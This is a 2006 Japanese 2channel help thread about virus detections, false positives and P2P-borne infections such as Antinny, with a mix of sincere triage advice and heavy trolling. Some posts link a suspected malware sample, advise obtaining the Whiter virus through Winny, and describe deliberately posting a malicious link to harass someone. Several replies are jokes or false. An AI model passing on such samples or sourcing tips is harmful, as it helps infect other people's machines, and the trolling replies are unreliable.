先ほど、AntiVirがC\Program Files\Lhaplus\Lhaplus.exeを「TR/Dldr.Stration.I」
として検出したのですが、誤検出だと考えてよろしいでしょうか?
283名無しさん@お腹いっぱい。:2006/11/28(火) 18:21:12
だな
updateせよ
284名無しさん@お腹いっぱい。:2006/11/28(火) 18:52:33
お前ら二十歳すぎて何やってんの?
もちろん現実世界でしか生きてこなかった純情な人にとっては過酷だけど
ネットってそういう世界だよ。騙し合いの世界。それは契約社会とは程遠いところにある。
出てくる情報全てが嘘だと疑うことから始めれ。
そしてこっちからわざわざ個人情報を与える必要はない。
285名無しさん@お腹いっぱい。:2006/11/28(火) 18:56:17
ああいう馬鹿は漢字が多いと読めないよ。
286名無しさん@お腹いっぱい。:2006/11/28(火) 19:24:23
>>284
すべては信じることからはじまると思うんだが
287名無しさん@お腹いっぱい。:2006/11/28(火) 21:39:37
>>284
騙しには騙しのテクニックがある。
あらゆる分野に長けている人間を騙すには、疎い分野を見付けなければならないが、
必ずそれは論理破綻している。

そいつらよりも利口になればいい事だ。
288名無しさん@お腹いっぱい。:2006/11/28(火) 21:47:16
携帯からですPC機動できなくなりました助けてください
【使用OS】 WIN MX
【WINDOWS UPDATE】 してます
【ウィルスソフト】 Kaspersky
【UPDATE】 してます
【スキャン】 ―――
【症状】 起動不可セーフモードも
【やったこと】 電子メールを実行
【とった処置】 再起動したら起動不可になった
289名無しさん@お腹いっぱい。:2006/11/28(火) 21:50:39
>>288
いま流行っているwhiterの亜種にひっかかったんじゃね
nyとかMXとかしてたらの話だけど
290名無しさん@お腹いっぱい。:2006/11/28(火) 21:51:58
>>288
ハイ おしまい
何故起動不能なのかがわからないから、
レジストリハイブのバックアップがなければ無理。
回復コンソールを使ってこれらを書き戻す。さいなら〜
291名無しさん@お腹いっぱい。:2006/11/28(火) 21:54:53
【使用OS】 WIN MX  て何?
292名無しさん@お腹いっぱい。:2006/11/28(火) 21:56:18
>>288
釣れますか?
293名無しさん@お腹いっぱい。:2006/11/28(火) 21:56:25
>>291
MXであぼーんって意味w
294288:2006/11/28(火) 21:56:51
>>289
MXは使っていますが関係ありません

>>290
キー!!

>>291
OSです
それくらい理解してください
295名無しさん@お腹いっぱい。:2006/11/28(火) 21:58:05
>>288
Meなら・・・寿命です
MXなら・・・板違いです
296名無しさん@お腹いっぱい。:2006/11/28(火) 21:58:26
>【ウィルスソフト】 Kaspersky
このウイルスが問題なんだろ?
297名無しさん@お腹いっぱい。:2006/11/28(火) 22:05:59
謎のOSなんだからメーカーに聞くのが本筋
298名無しさん@お腹いっぱい。:2006/11/28(火) 22:09:34
>>288を正しく修正してみました
使用OS】 WIN MX
【WINDOWS UPDATE】 してます
【ウィルスソフト】 Antinny
【UPDATE】 してます
【スキャン】 ―――
【症状】 起動不可セーフモードも
【やったこと】 Antinnyを実行
【とった処置】 再起動したら起動不可になった
299名無しさん@お腹いっぱい。:2006/11/28(火) 22:10:03
なんだ釣りか
300288:2006/11/28(火) 22:11:59
>>296
ウイルスではないと思います
正しく書きますとKasperskyエンジンのソフトです
301名無しさん@お腹いっぱい。:2006/11/28(火) 22:12:09
久々にワロタ
OSにWINMXってあったんだね! 鼻から焼酎吹いた
粘膜の洗浄になったよ  サンキュウ
302名無しさん@お腹いっぱい。:2006/11/28(火) 22:17:11
ノートパソコンかい? 先日電池パック死んだんで焦ったが、電池パック抜いてアダプターから電源確保したら起動できました。
ウイルスが原因なら今、わたしが書いたことはスルーしてください。
303288:2006/11/28(火) 22:20:22
ダチに聞いたら前回正常起動時の構成で起動できないのかと言われてやってみたのですが
起動できませんでした
真っ暗なまま止まります
英語の変な文字がでてきます
304名無しさん@お腹いっぱい。:2006/11/28(火) 22:21:06
【使用OS】 WIN MX

     ↓

使用OS】 WIN MX

     ↓

【 が無くなったって事は OSがバージョンupしたか?
305名無しさん@お腹いっぱい。:2006/11/28(火) 22:25:12
電子メールを実行とかOSがMXだとか英語の変な字が出てきますとか
お前の脳がウイルスに犯されてるんじゃないか?
306288:2006/11/28(火) 22:34:41
>>305
どうして人が傷つくようなことが平気で言えるのか?
本気で困っているんです
レジストリハイブも回復コンソールだってなんのソフトかわからないし
307名無しさん@お腹いっぱい。:2006/11/28(火) 22:35:41
>>288に便乗質問します
【使用OS】 WINNY
【WINDOWS UPDATE】 してます
【ウィルスソフト】 ErrorSafe
【UPDATE】 してます
【スキャン】 ―――
【症状】 ハードディスクが認識しない?
【やったこと】 Alt+F4押しつづけても画面が開き続けて閉じることができなくなって
【とった処置】 怖くなってあわててコンセント抜いてしまいました
308名無しさん@お腹いっぱい。:2006/11/28(火) 22:48:51
>>307
そんな時にはファイル名を指定して実行に
「tskill iexplore」
惜しかったね もっと早く知っとけばよかったね
309288:2006/11/28(火) 22:49:25
このまま起動できないままだと大事なファイルが見れなくなります
ダウンロードしたデジカメのファイルが見れなくなるのは一番困ります
310名無しさん@お腹いっぱい。:2006/11/28(火) 22:58:13
>ダウンロードしたデジカメのファイル<
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(?д?)
311名無しさん@お腹いっぱい。:2006/11/28(火) 23:06:06
他人がデジカメで撮ったやつを収集していたという感じかな…まぁ、そんなものはまた集めれば良い訳で…。
312名無しさん@お腹いっぱい。:2006/11/28(火) 23:30:13
友達のPCにHDつけてもらって中身ぬきだせば?
313MONA ◆ApRjtwCQJQ :2006/11/29(水) 00:02:02

     ∧_∧   
    ( ´∀`)  まぁ CDブートとかですな
    (    )  1CD LinuxとかBart PEとか
    | | |   知り合いに頼んだら USBメモリとかに吸い出せるかと
    (__)_)  デバイス繋いでからブートしましょう
314名無しさん@お腹いっぱい。:2006/11/29(水) 00:06:55
【使用OS】 windows xp
【WINDOWS UPDATE】 最新
【ウィルスソフト】  ノートン
【UPDATE】  最新
【スキャン】  かけてる
【症状】  ギコネコが画面のなかをフワフワとうごきながら『迷い込んだようだ』という
【やったこと】  lanから切断
【とった処置】  再度スキャン中

ギコネコがふわふわ画面を動く ウイルスというのがあるのでしょうか?
お教えいただけるとありがたいです
これは別端末より 書き込みしてます
315名無しさん@お腹いっぱい。:2006/11/29(水) 00:29:39
>>314
gifアニメならな
きっと何でもねえよ
316名無しさん@お腹いっぱい。:2006/11/29(水) 00:46:37
>>314
ジョークプログラムだろう
特定して送っときゃいい。
■ウイルス感染の疑いがあるファイルをSymantec Security Responseに提出する方法
http://service1.symantec.com/SUPPORT/INTER/entsecurityjapanesekb.nsf/jp_docid/20020624043939949
317名無しさん@お腹いっぱい。:2006/11/29(水) 00:54:31
>>315
アドバイスありがとうございます.
>>316
アドバイスありがとうございます。

314です。はじめてなので、パニクリました。
318ギコ:2006/11/29(水) 01:13:19

      ∧ ∧
〜′ ̄ ̄( ゚Д゚) すんまそん
 UU ̄ ̄ U U

http://nekokick.at.infoseek.co.jp/gikogiko.htm
319名無しさん@お腹いっぱい。:2006/11/29(水) 01:43:37
Mac、Linux、UNIXのウィルス情報のスレありませんか?
320名無しさん@お腹いっぱい。:2006/11/29(水) 01:51:24
cookieの名前が変わるウイルスってありますか?
321名無しさん@お腹いっぱい。:2006/11/29(水) 03:56:10
【使用OS】XP
【WINDOWS UPDATE】している
【ウィルスソフト】バスター
【UPDATE】している
【スキャン】バスター
【症状】Adware_PlanetNewsというのがでてくる。
【やったこと】とくになし
【とった処置】まだしていない

バスターのデータベースででてこない。
ググるとマカフィーでは大丈夫とでてきます。
放置して大丈夫なのでしょうか?
322名無しさん@お腹いっぱい。:2006/11/29(水) 03:57:52
テンプレにのっとらない形の投稿で申し訳ございません
どなたか助けてください…
さきほどネット上で「Ghost Recon AW」というゲームのNo Diskパッチを探していたところ
海外のサイトでそれらしきモノがあったのでダウンロード&インストールしたのですが
どうやらそれがウィルスだったらしくそのまま感染してしまいました…
最初hitman pro2 やウィルスバスターのスパイウェアの検索&削除をおこなっていたのですが
どうにも駆除できませんでした。その間もウィルスはタスクバーに表示され活動中…
それまでの記憶をたどり検索してみた所
ttp://www.viruschaser.jp/vi_index/vi_w/Win32.HLLW.Tibic.html
上記のページにある「Win32.HLLW.Tibic」が入ってしまった可能性が浮上してきました。
これはあくまで憶測ですが、起動中sysmatrixのNet in & Net outにもわずかながらデータの送受信が確認できたので上記のページに記されているP2Pを利用してという部分にも合致しているかと思います。

そして、その後上記のページにあるvirus chaserのdemoをインストールし駆除を試みました。
しかしvirus chaserが検索を開始し、「ウィルスを発見しました。削除しますか」と表示された瞬間にPCが強制終了…。
その後再起動しても、スタートアップ画面からログオンし、最初のデスクトップ画面が表示されたところでそのまま停止。
別のユーザーでログオンしてもまったく同じ状態で停止…。
(一応画面上にアイコンは表示されます。が、タスクバーの常駐型ランチャー等を読み込んでいる途中で止まります)
実質、起動しても何もできない状態です…。
今現在この書き込みに関しては別のPCから行っています。
ちなみにPCの構成は下記の通りです
Windows XP 2
Athlon X2 4600
mem 3G
MB:K8N Neo4-FX
windows update &virus buster updateほぼ毎日チェック更新おこなっております

長々とすいませんでした。
どなたか解決方法に心当たりのある方がいらっしゃいましたらおしえてください。
よろしくお願いします。
323名無しさん@お腹いっぱい。:2006/11/29(水) 04:12:26
   ∩___∩
   | 丿     ヽ
   /  ー   ー |    
   |    ( _●_)  ミ        
  彡、    ヽノ ,,/     
  /     ┌─┐´    
 |´  丶 ヽ{ .   }ヽ    
  r    ヽ、__)ニ(_丿    
 ヽ、___   ヽ ヽ     
  と____ノ_ノ
324名無しさん@お腹いっぱい。:2006/11/29(水) 04:20:26
             ○
         ⊂⊃ ⊂⊃ /~~\   ⊂⊃
    林林............,,,,傘傘傘::::::::傘傘傘.........林.林...

      zzzzzzzz...........
               _,,..,,,,_
       、,  ,,, 、,,  ./ ,' 3/⌒ヽ-、_   、 ,,  @
         、,   /l.  /____/      ヽ|ノ,,
    @   ,,, 、,,  ̄,, ̄ ̄ ̄ ̄,, ̄   ,,, 、,, 
    ヽ|ノ 、、,  ,, 、,,   , "  ,,  、、, ,,
325名無しさん@お腹いっぱい。:2006/11/29(水) 04:34:40

               ∧∧
          _。 (´・ω・`)_
         /c(_ア旦 ̄ ̄/ヽ
       /______/※※ヽ、 ぬくぬくぬく
     〆※       ※ ※//
    ∠二二二二二二二二二ゝ
326名無しさん@お腹いっぱい。:2006/11/29(水) 04:35:39
>>321
>Adware_PlanetNews
これ正確?ぐぐってもまったく出てこないのだが・・・
327名無しさん@お腹いっぱい。:2006/11/29(水) 04:41:05
>>322
これにこりてP2Pをやめるべし。
さっさとOSをクリーンインストールしてしまうことを推奨したい。
意地悪ではなく、それがあんたの為になると本気で思っているので。
328321:2006/11/29(水) 05:49:28
>>326
間違いないです。そのまま詳細調べようとしてみたんですが、
データベースでてこなかったんです。
一体なんなんだろう・・・
とりあえずspybotを入れてみます。
329321:2006/11/29(水) 05:51:44
追記
PlanenNewsというのはでるんですが・・・
330名無しさん@お腹いっぱい。:2006/11/29(水) 06:41:55
>>321
>ググるとマカフィーでは大丈夫とでてきます。
そのマカフィーのページでいいから、そこのURLを貼り付けてみて。
331名無しさん@お腹いっぱい。:2006/11/29(水) 07:22:00
【使用OS】 win2k
【WINDOWS UPDATE】自動更新にてやっています
【ウィルスソフト】バスター
【UPDATE】昨日夜に実施
【スキャン】いつやったか覚えてないです
【症状】 全ファイルがpugyaaa○○に
【やったこと】全パーテーションフォーマット
【とった処置】上記



質問ではなくやってしまった見たいなので報告

ところで何て言うウィルスか知ってる方おられましたら教えて下さい

後最近なりふり構わずwinnyでエロゲ収集してました
では今度p2pはやめる事にして復旧してきます

ノシ
332名無しさん@お腹いっぱい。:2006/11/29(水) 08:11:35
pugyaaaウィルス
333名無しさん@お腹いっぱい。:2006/11/29(水) 08:15:47
>>332
サンクス
今情報収集していましたが
もう一つのp2pソフト(名前失念)発祥のウィルス見たいですね
334名無しさん@お腹いっぱい。:2006/11/29(水) 10:39:04
BISHOPの放課後2でもやったんだろ
ホワイターが仕込んであるのはみんな知っているのに
335名無しさん@お腹いっぱい。:2006/11/29(水) 13:39:48
【使用OS】 win2k
【WINDOWS UPDATE】自動更新
【ウィルスソフト】avast、ad-aware
【UPDATE】毎日実施
【スキャン】
1.スタートアップ等のみの簡易スキャン:約1週間おきの再起動時に毎回
2.手動スキャン:昨日(前回の手動スキャンは3ヶ月ほど前)
※なお、このところ起動後の常駐スキャンは止めていました
【症状】 不明
【やったこと】avastにて手動スキャン時に発見・削除
【とった処置】上記

c:\winnt\$NtServicePackUninstallの中に"conime.exe"という
ファイル名のトロイが見つかりました。
avastで表示された名称は"Win32 Patched-B[Trj]"です。
これはどんな悪さをするものなんでしょうか?
avastのサイトで詳細を検索してもヒットしなかったので
気持ち悪いです。
336321:2006/11/29(水) 13:56:34
http://upp.sakura.ne.jp/src/upp4925.jpg

遅くなりました。このように表示されてしまいます。
マカフィーのは間違いでした。(adware_PlanenNewsというよく似た名前のサイトでした)
どう対処したらよいのでしょうか?
337世界最強至高のアンチウイルスソフトそれがNOD32だ!! :2006/11/29(水) 14:28:26
>>336
アンインスコ→NOD32を買う
338名無しさん@お腹いっぱい。:2006/11/29(水) 14:30:47
>>336
結局Spybotでは検出されなかったの?
339321:2006/11/29(水) 15:08:21
spybotでは大丈夫と出たんですが・・・
ググってもでてこないものが突然出てきて驚いています。放置しても大丈夫なんでしょうか?
340名無しさん@お腹いっぱい。:2006/11/29(水) 15:34:55
>>321
HKLM\Software\Microsoft\Internet Explorerの先も書き込めばこたえてくれる方がいるかもね。
VB2007のログの「アイテム名」と「タイプ」の間にマウスポインターを合わせ右にドラッグ
すると全体が見えると思う。
今の段階ではSearch Pageなどが書き変えられている可能性が…とか
341321:2006/11/29(水) 16:08:15
ttp://upp.sakura.ne.jp/src/upp4926.jpg

ありがとうございます。見れますでしょうか?
342名無しさん@お腹いっぱい。:2006/11/29(水) 16:16:53
>>341
フレッツ接続ツールでも使ってる?
343321:2006/11/29(水) 16:28:44
>>342
はい。それが問題なのでしょうか?
344名無しさん@お腹いっぱい。:2006/11/29(水) 17:13:46
>>343
http://www.trendmicro.com/vinfo/grayware/ve_graywareDetails.asp?GNAME=SPYW%5FLOCATOR%2E100

検索してみたらSPYW_LOCATOR.100というのが出てくるけど、フレッツ接続ツールの方も出てきた
他に該当するキーがなければ誤検出とみていいんじゃないかな
345321:2006/11/29(水) 17:20:18
>>344
本当にありがとうございました。次回から放置で処置するのが最善なのでしょうか?
346名無しさん@お腹いっぱい。:2006/11/29(水) 17:51:34
>>345
HijackThis というフリーウェアがある。
http://pc8.2ch.net/test/read.cgi/sec/1091346741
今回の確認項目は"O9"のみ
O9 - Extra button: フレッツ接続ツール - {A26ABCF0-1C8F-46e7-A67C-0489DC21B9CC} - C:\PROGRAM FILES\NTTE\FLETS\APP\TANGOIEBAR.DLL
ならバスターの誤検出でOK
347321:2006/11/29(水) 18:26:26
>>346
本当に皆様ありがとうございました。感謝いたします。
348名無しさん@お腹いっぱい。:2006/11/29(水) 19:09:35
349335:2006/11/29(水) 19:52:43
>348
ありがとうございます。
胃が痛くなっていたのですが少し安心しました。
しかし当該ファイルを即座に削除したために
リンク先に書かれているファイルと同一のものだったのか
確認できないのが気がかりです。
多くのavast + win2kユーザが検出すると思われるのに
この件があまり話題に上がってないのは何故なんだろう・・・?
350名無しさん@お腹いっぱい。:2006/11/29(水) 20:21:04
【使用OS】 WINXP Home SP2
【WINDOWS UPDATE】 自動更新。現在最新
【ウィルスソフト】 Norton Internet Security2006、Pestpatrol
【UPDATE】 ウイルスソフトは最新にアップデート済み
【スキャン】 Nortonでスキャンしたがウイルスなしと表示。
【症状】 だがKISでスキャンするとトロイ2つ発見(名前は忘れました)
【やったこと】 【とった処置】 Kasperskyのオンラインスキャンでスキャン→(Nortonを無効にして)Kaspersky〜の体験版をインストール
→スキャンし削除→アンインストール→(Nortonを有効化)

ぁゃιぃ添付を開いたら、ウイルスに感染しますたorz再スキャンしても出て子なったのですが
再インストール以外でほかにとるべき措置はありますか?
351名無しさん@お腹いっぱい。:2006/11/29(水) 21:13:40
>>350
トロイの名称は?
352名無しさん@お腹いっぱい。:2006/11/29(水) 21:30:50
>>350
ノートンアップデートセンター(ノートン2006利用者向け無償アップグレード)※2006年版ライセンス有効期間内であることが条件
http://www.symantec.com/ja/jp/home_homeoffice/support/special/upgrade2007/index.jsp
353350:2006/11/29(水) 21:40:20
回答ありがとうございます。
>>351
2つのうち1つはTrojan-Dropper.Win32.Agent.aznです。もう1つは忘れましたorz
>>352
2007に無償アップグレードできるとは知りませんでしたのでアップデートして再スキャンしてみます。
354お願いいたします:2006/11/29(水) 23:44:42
【使用OS】 windows xp
【WINDOWS UPDATE】 最新
【ウィルスソフト】  ノートン
【UPDATE】  最新
【スキャン】  かけてる
【症状】  起動時にWMPが立ち上がりすぐに再起動、WMPを閉じればその後は動いてます
【やったこと】  何がなにやらわかりません
【とった処置】  とりあえず再度スキャン中

scrファイルを実行した途端にコマンドプロンプトが一瞬立ち上がり、再起動。
移行症状が回復しません。
どなたか対処法をご教授願います。
355名無しさん@お腹いっぱい。:2006/11/30(木) 00:10:57
>>354
しっちゃかめっちゃかだな
NortonとWMPのバージョンくらい書け。
356354:2006/11/30(木) 00:15:19
>>355さんすいません
ノートンは2006
WMPはver10です。
ちょっとパニクってました。
357355:2006/11/30(木) 00:18:45
>>354
「誘導されてきました」とことわってから
Nortonスレでも相談してみればいい。
Nortonスレのテンプレ2に再記入するように。
http://pc8.2ch.net/test/read.cgi/sec/1164252696/l50
358354:2006/11/30(木) 00:25:19
>>355さんありがとうございます
向こうにも行って見ます
359名無しさん@お腹いっぱい。:2006/11/30(木) 09:15:26
向こうにも書いてあるが
http://n.limber.jp/n/SXiQBcKFx
とりあえず>>354と同じっぽい感染元ファイルおいときます。

症状は>>354と同じです
360名無しさん@お腹いっぱい。:2006/11/30(木) 11:34:47
>>359
mp3ファイルを極窓で調べたら拡張子不明だし、
ファイルの再生方法.txt.scr
こんなファイルも付属されてるし
361335:2006/11/30(木) 12:05:21
解決です。
win2k proのCDをスキャンしたらオリジナルのconime.exeが
トロイ扱いされて引っかかりました。
確かにavastの誤検出だったようです。

conime.exe 26,384 bytes 1999/12/08 10:55:06
MD5:0177C933D682EACC1118DD7097640F7B

avastの 22.11.2006 - 0650-0 更新分の定義ファイルに追加された
"Win32:Patched-B [Trj]"と上記のconime.exeのビットの並びが
たまたま一致したんでしょうね。
362名無し:2006/11/30(木) 14:19:25
誰かホワイターって持ってないかい?
いろいろ探したけど見あたらないよ〜
363名無しさん@お腹いっぱい。:2006/11/30(木) 17:06:42
>>362
nyで何処かのエロゲーをダウソ汁
364名無しさん@お腹いっぱい。:2006/11/30(木) 17:51:16
【使用OS】 windows xp
【WINDOWS UPDATE】 最新
【ウィルスソフト】 マカフィー
【UPDATE】  最新
【スキャン】  かけてる
【症状】  スキャン結果で『Dialer-182』レジストリ脅威が検出される、ちなみに駆除されない
      あとその実際に『Dialer-182』に何されているのか分からない(マカフィーのHPに載ってないから)
【やったこと】【とった処置】  再度スキャン

『Dialer-182』って何なんだ(-_-;) マカフィーのHPのウィルス検索にもひっかからんから対処方法がわからないよー
365名無しさん@お腹いっぱい。:2006/11/30(木) 18:08:42
勝手に電話するやつ
366名無しさん@お腹いっぱい。:2006/11/30(木) 18:27:26
>>364
マカフィーでわからないなら、オンラインスキャンで探ってみると良いよ。

カスペルスキー:オンライン ウイルス&スパイウェアスキャナ 
ttp://www.kaspersky.co.jp/scanforvirus/
367名無しさん@お腹いっぱい。:2006/11/30(木) 20:08:39
>>365 >>366
レスサンクス!とりあえずオンラインスキャンやってみます
368名無しさん@お腹いっぱい。:2006/11/30(木) 20:18:28
>>366
説明できないのに書き込むオナニー野郎乙!
369名無しさん@お腹いっぱい。:2006/11/30(木) 20:48:02
>>368
ごめんなさい、わたし野郎じゃなくて女ですし、オナニー←必用ありません、彼がいますので。
あなたも、そんな虚しい書き込みはやめて早く彼女でも作ってくださいね。
370名無しさん@お腹いっぱい。:2006/11/30(木) 22:10:03
【使用OS】 windowsXP
【WINDOWS UPDATE】 できなくなった
【ウィルスソフト】 ノートンが入っていたような・・・&hijackthis
【UPDATE】 たぶん
【スキャン】 hijackthisっていう解析ソフトで↓の奴が出てきた
O4 - HKLM\..\Run: [ara-key] C:\Program Files\WindowsUpdate\wuaudnld.tmp\cabs\com_microsoft.Q831167_IE6_SP1\Q8311674967.exe -StartUp
O4 - HKLM\..\Run: [Windows Security Manager] C:\Windows\system32\drivers\etc\svchost.exe -c -ax
【症状】 起動すると「フォルダが壊れています」っていうようなメッセージがでてくる
【やったこと】 何もしていない・突然出てきた
【とった処置】 毎回起動時に出てくる上のメッセージを閉じてる
371名無しさん@お腹いっぱい。:2006/11/30(木) 22:15:57
>>370
O4 - HKLM\..\Run: [ara-key]・・・っていうエントリーは百発百中antinny
っていうウイルスなんだけど、このウイルスってnyしてなければ
感染することなんて完全皆無だけどね。
お前、winnyしてるんじゃないんか?
372名無しさん@お腹いっぱい。:2006/11/30(木) 22:17:46
>>370
悪いことは言わん 再インストールしなさい 中身がウイルスでボロボロだ
仮に駆除できたとしても、不調は直らないかもよ 
373370:2006/11/30(木) 22:18:38
>>371
↓はantinnyという名のウイルスなんですか?
O4 - HKLM\..\Run: [ara-key]
しかし変ですね、winnyなんて一度も使ったことは無いのですが。
どこから入ってきたんでしょう?
374名無しさん@お腹いっぱい。:2006/11/30(木) 22:20:11
375名無しさん@お腹いっぱい。:2006/11/30(木) 22:21:21
>>373
まあな、もうひとつ
O4 - HKLM\..\Run: [Windows Security Manager] C:\Windows\system32\drivers\etc\svchost.exe -c -ax

これもantinny。亜種だけどな。
もう一度聞くよ?
本当にwinnyしてないんだな。
376370:2006/11/30(木) 22:24:52
>>372
再インストールとはノートンのことでしょうか?
知識が乏しくてPC始めてから1ヶ月もたたない初心者ですので・・・

>>375
はいやってません。身に覚えもありません。
377名無しさん@お腹いっぱい。:2006/11/30(木) 22:30:46
>>376
最近ソフトいれたり、誰かからファイル貰ったりしてない?
378名無しさん@お腹いっぱい。:2006/11/30(木) 22:32:10
>>376
俺は執念深い男だからな。
最後の確認として、ファイルの検索っていうやつを使ってだ、winnyという名前の
フォルダ・ファイルが存在するか確認してもらえんか?
スタート→検索→フォルダやファイルの検索

探す場所→c:\

詳細→サブフォルダの検索にチェックを付ける

名前→winny

検索
379370:2006/11/30(木) 22:35:21
>>377
知らない人からソフトやファイルをもらう理由なんてありませんよ。

>>378
今してみますね。
380370:2006/11/30(木) 22:38:45
フォルダ・ファイルの検索でwinny2という名前のフォルダが見つかりました。
381名無しさん@お腹いっぱい。:2006/11/30(木) 22:44:05
おまwww普通にありえねーよwww
あんまり釣れなかったねwww
382名無しさん@お腹いっぱい。:2006/11/30(木) 22:44:39
はい、撤収撤収
本人かどうかはどうでもいい
383名無しさん@お腹いっぱい。:2006/11/30(木) 22:52:42
>>380
nyしてなかったらwinnyって名前のフォルダは見つからんぞ?
384370:2006/11/30(木) 22:54:25
>>381
釣りとかじゃなくて本当に困っているんです!
385名無しさん@お腹いっぱい。:2006/11/30(木) 22:56:18
>>384
 →>>383
386370:2006/11/30(木) 22:57:45
>>382
370です。信じてください(泣

>>383
winnyはやってません!
ハッカーです。
ハッカーが私のPCに侵入しwinnyを入れたのです。
387名無しさん@お腹いっぱい。:2006/11/30(木) 22:58:50

悪い
388名無しさん@お腹いっぱい。:2006/11/30(木) 23:00:28
ごめん。スーパーハカーの俺がやったwww
389名無しさん@お腹いっぱい。:2006/11/30(木) 23:00:39
>>386

俺を笑い殺す気かてめえ!?
始めて耳にしたぞ、侵入先のPCにnyをインストールするハッカーがいるって。
390質問です:2006/11/30(木) 23:01:39
2ちゃんねる内でわけのわからないURLをコピペして貼りつけてしまいました
携帯からだったのでウイルスが本当にあるなどの確認などできませんでしたが
そのURLを開いた方の話ではウイルスに感染したと言われています
それで、その方から裁判にすると言われております、
これは犯罪になるのですか?また私はどのような処置を取ればいいでしょうか?
インターネットには詳しくないのでご意見を頂きたくレスさせてもらいました
詳しい方教えていただけないでしょうか、よろしくお願いしますm(__)m
391名無しさん@お腹いっぱい。:2006/11/30(木) 23:05:12
>>390
逮捕きたーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー
392370:2006/11/30(木) 23:05:56
間違いなくハッカーの仕業です。
自分は入れた覚えが無いのに、いつのまにか勝手に入っていた
というのが、ハッカーの仕業と言う証拠です。
393名無しさん@お腹いっぱい。:2006/11/30(木) 23:06:29
>>390
どこに貼ったの?ほんとにウイルスか確認してきてやるよ。
394名無しさん@お腹いっぱい。:2006/11/30(木) 23:08:55
>>393
こちらに貼ってもよろしいですか?
395名無しさん@お腹いっぱい。:2006/11/30(木) 23:10:00
>>394
うん。一応頭のhは抜いてね。
396名無しさん@お腹いっぱい。:2006/11/30(木) 23:13:52
>>395さんへ
ttp://www.geocities.com/fuzoku_ou/index.htm
ウイルスがある可能性があります。
397名無しさん@お腹いっぱい。:2006/11/30(木) 23:17:12
>>396
いま見てきてやるよ。それからどのスレに貼ったのさww
398名無しさん@お腹いっぱい。:2006/11/30(木) 23:20:04
>>397
ちょっとスレまでは言いたくないのですが…
すみませんm(__)mちょっと嫌な話になっているのであまりみられたくないのです。
本当に困ってここにきました。
399名無しさん@お腹いっぱい。:2006/11/30(木) 23:21:55
恋愛サロンの中の板に貼ってはありました。
私がみかけたのは二つです。
400名無しさん@お腹いっぱい。:2006/11/30(木) 23:29:59
>>396
ウイルスは平気だったぞ。ただのブラクラだよ。
それから、訴えるってwwwほっとけ、大丈夫だから。でもあんまり変なURL貼るのはやめようねw
風俗王ボブってwww
401名無しさん@お腹いっぱい。:2006/11/30(木) 23:34:20
>>400
ありがとうございましたm(__)m
確認なんですがウイルスはなかったのですか?
ちなみにブラクラってなんでしょうか?
その相手がいっていたウイルス名をちょっとコピペさせてもらいます
みていただけませんか?
402名無しさん@お腹いっぱい。:2006/11/30(木) 23:37:59
ウイルス名:JS_NOCLOSE.AE
・侵入方法:
この不正プログラムは、通常悪意のあるWebサイトに組み込まれており、
ユーザがアクセスした際に実行されます。
また、スパムメールに添付されてコンピュータへ侵入する場合もあります。


このウイルスに感染したと言われました。
403名無しさん@お腹いっぱい。:2006/11/30(木) 23:41:32
それはそれは、この度はおめでとうございます
404名無しさん@お腹いっぱい。:2006/11/30(木) 23:45:25
>>403
えっ?
私本当に困ってるんです、裁判するなんていわれてから
不安で不安で…(;_;)
405名無しさん@お腹いっぱい。:2006/11/30(木) 23:57:13
ブラクラはぐぐってきました、だいたい内容はわかったような気はしますが…
ウイルスが本当になかったんであれば安心できます。
本当にありがとうございましたm(__)m
406名無しさん@お腹いっぱい。:2006/12/01(金) 00:03:51
>>405
ウイルス仕込まれてたよ。ノートンではTrojan Horse検出したよ。
やばいかもね。
407名無しさん@お腹いっぱい。:2006/12/01(金) 00:07:31
>>406
うわぁ…まじですか……?訴えられたらどうしよ……
408名無しさん@お腹いっぱい。:2006/12/01(金) 00:15:55
>>407
どんな状況でリンクはったの?
409名無しさん@お腹いっぱい。:2006/12/01(金) 00:21:39
実はちょっと嫌な奴がいて、リンク貼りつけてました…
ちなみに相手にたいしてレスアンカーはつけてないんですが…
携帯からなんでウイルスがあることなんて想定できなかったんです、
まさか本当にあったなんて……orz
410名無しさん@お腹いっぱい。:2006/12/01(金) 00:25:00
さっきから裁判とか訴えるとか意味が分からないんだけど
411名無しさん@お腹いっぱい。:2006/12/01(金) 00:27:14
その相手はネット関係の仕事をしているとかなんとかで
損害賠償を請求するとか言われました…
URL貼りつけて犯罪行為になることすら知らなかったので
こんなことになってしまったんです。
412名無しさん@お腹いっぱい。:2006/12/01(金) 00:29:03
>>409
じゃあ悪意があった訳だね・・・・・行為は誉められたものではないけど、訴訟云々は気にしなくても大丈夫だと思うよ。
これに懲りてもうしなければいいんじゃない。
413名無しさん@お腹いっぱい。:2006/12/01(金) 00:30:38
>>411
ネット関係の技術者が安易にリンク踏んでファビョってるの???
頼むから該当スレ教えてくれ。
414名無しさん@お腹いっぱい。:2006/12/01(金) 00:31:03
>>410
ウイルスに感染するリンクをわざと貼ったとかで、
犯罪だから警察に報告して裁判にすると言われてるんです。
私のやったことは犯罪じゃないんですか?
415名無しさん@お腹いっぱい。:2006/12/01(金) 00:34:06
>>413
このスレのhttp://human5.2ch.net/test/read.cgi/4649/1164261413/

570辺りからです。
416名無しさん@お腹いっぱい。:2006/12/01(金) 00:37:46
こんなんで警察動く訳ねーだろ
417名無しさん@お腹いっぱい。:2006/12/01(金) 00:39:55
そのスレの住民のテンションがネタなのかマジなのか わからん
418名無しさん@お腹いっぱい。:2006/12/01(金) 00:40:34
>>416
ネタかなー?って考えてたんですが
に、してはかなり引っ張ってるんで信じてしまうんですよ…
419名無しさん@お腹いっぱい。:2006/12/01(金) 00:41:06
>>415
ざっと読んできた(笑)大丈夫だからもう寝なよ。
君はなかなか素直な子なんだね。他のスレ覗いたことある?ウイルスなんていっぱいリンクされてるよ。
とにかく安心して大丈夫だよ^^
420名無しさん@お腹いっぱい。:2006/12/01(金) 00:47:00
>>419
他のスレはあまりみたけとないんです…そんなに貼ってあるんですか!
それに、あそこまで言われたら信じてしまいました
すみませんでした、ご迷惑おかけしましたm(__)m
本当に本当にありがとうございました、もぅ悪戯はいたしません。
421名無しさん@お腹いっぱい。:2006/12/01(金) 17:08:30
【使用OS】 WINXP
【WINDOWS UPDATE】 自動更新
【ウィルスソフト】  マカフィーセキュリティセンター
【UPDATE】  してる
【スキャン】 3日前
【症状】  マカフィーのシールドが勝手に切れたりする
      あと タスクにnordsys.exe oasclnt.exe exe.exe wuauclt.exe
などがあるんですけど これは消したほうがいいのでしょうか
422名無しさん@お腹いっぱい。:2006/12/01(金) 18:59:45
